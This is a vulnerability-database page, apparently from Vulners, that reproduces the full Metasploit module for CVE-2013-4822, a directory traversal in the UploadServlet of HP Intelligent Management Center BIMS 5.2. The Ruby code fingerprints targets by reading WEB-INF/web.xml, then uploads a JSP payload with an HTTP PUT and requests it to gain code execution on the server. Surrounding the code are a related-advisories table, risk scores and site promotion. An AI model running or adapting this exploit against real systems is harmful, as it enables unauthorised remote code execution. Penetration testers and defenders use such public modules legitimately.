Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

HP Intelligent Management Center BIms UploadServlet - Directory Traversal (Metasploit)

🗓️ 22 Oct 2013 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 39 Views

HP Intelligent Management Center BIMS UploadServlet Directory Traversal vulnerability on version 5.2 allows arbitrary file download and upload. Tested on HP IMC 5.2 E0401 on Windows 2003 SP2

Related
Code
ReporterTitlePublishedViews
Family
0day.today		HP Intelligent Management Center BIMS UploadServlet Directory
22 Oct 201300:00
zdt
Circl		CVE-2013-4822
22 Oct 201300:00
circl
Check Point Advisories		HP Intelligent Management Center BIMS UploadServlet Arbitrary File Upload (CVE-2013-4822)
4 Nov 201300:00
checkpoint_advisories
CVE		CVE-2013-4822
13 Oct 201310:00
cve
Cvelist		CVE-2013-4822
13 Oct 201310:00
cvelist
Dsquare		HP Intelligent Management Center BIMS UploadServlet File Upload
10 Feb 201400:00
dsquare
Tenable Nessus		HP Intelligent Management Center Branch Intelligent Management Module Multiple Vulnerabilities
9 Jan 201400:00
nessus
Metasploit		HP Intelligent Management Center BIMS UploadServlet Directory Traversal
19 Oct 201305:05
metasploit
NVD		CVE-2013-4822
13 Oct 201310:20
nvd
Packet Storm		HP Intelligent Management Center BIMS UploadServlet Directory Traversal
22 Oct 201300:00
packetstorm
Rows per page
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'HP Intelligent Management Center BIMS UploadServlet Directory Traversal',
      'Description' => %q{
          This module exploits a directory traversal vulnerability on the version 5.2 of the BIMS
        component from the HP Intelligent Management Center. The vulnerability exists in the
        UploadServlet, allowing the user to download and upload arbitrary files. This module has
        been tested successfully on HP Intelligent Management Center with BIMS 5.2 E0401 on Windows
        2003 SP2.
      },
      'Author'       =>
        [
          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2013-4822' ],
          [ 'OSVDB', '98247' ],
          [ 'BID', '62895' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-238/' ],
          [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943425' ]
        ],
      'Privileged'  => true,
      'Platform'    => 'win',
      'Arch'        => ARCH_JAVA,
      'Targets'     =>
        [
          [ 'HP Intelligent Management Center 5.1 E0202 - 5.2 E0401 / BIMS 5.1 E0201 - 5.2 E0401 / Windows', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 08 2013'))

    register_options(
      [
        Opt::RPORT(8080)
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'uri'    => normalize_uri("/", "upload", "upload"),
      'method' => 'GET',
      'vars_get' => { 'fileName' => "WEB-INF/web.xml" },
    })

    if res.nil?
      print_error("Unable to determine, because the request timed out.")
      return Exploit::CheckCode::Unknown
    end

    if res.code == 200 and res.headers['Content-Type'] =~ /application\/doc/ and res.body =~ /com\.h3c\.imc\.bims\.acs\.server\.UploadServlet/
      return Exploit::CheckCode::Vulnerable
    elsif res.code == 405 and res.message =~ /Method Not Allowed/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    # New lines are handled on the vuln app and payload is corrupted
    #jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
    jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"

    print_status("#{peer} - Uploading the JSP payload...")
    res = send_request_cgi({
      'uri'    => normalize_uri("/", "upload", "upload"),
      'method' => 'PUT',
      'vars_get' => { 'fileName' => jsp_name },
      'data' => payload.encoded
    })

    if  res and res.code == 200 and res.body.empty?
      print_status("#{peer} - JSP payload uploaded successfully")
      register_files_for_cleanup("..\\web\\apps\\upload\\#{jsp_name}")
    else
      fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
    end

    print_status("#{peer} - Executing payload...")
    send_request_cgi({
      'uri'    => normalize_uri("/", "upload", jsp_name),
      'method' => 'GET'
    }, 1)

  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Oct 2013 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 210
EPSS0.74063
hp imc 5.2directory traversalarbitrary filevulnerability discoverymetasploit modulecve-2013-4822osvdb-98247bid-62895windowsuploadservlet
39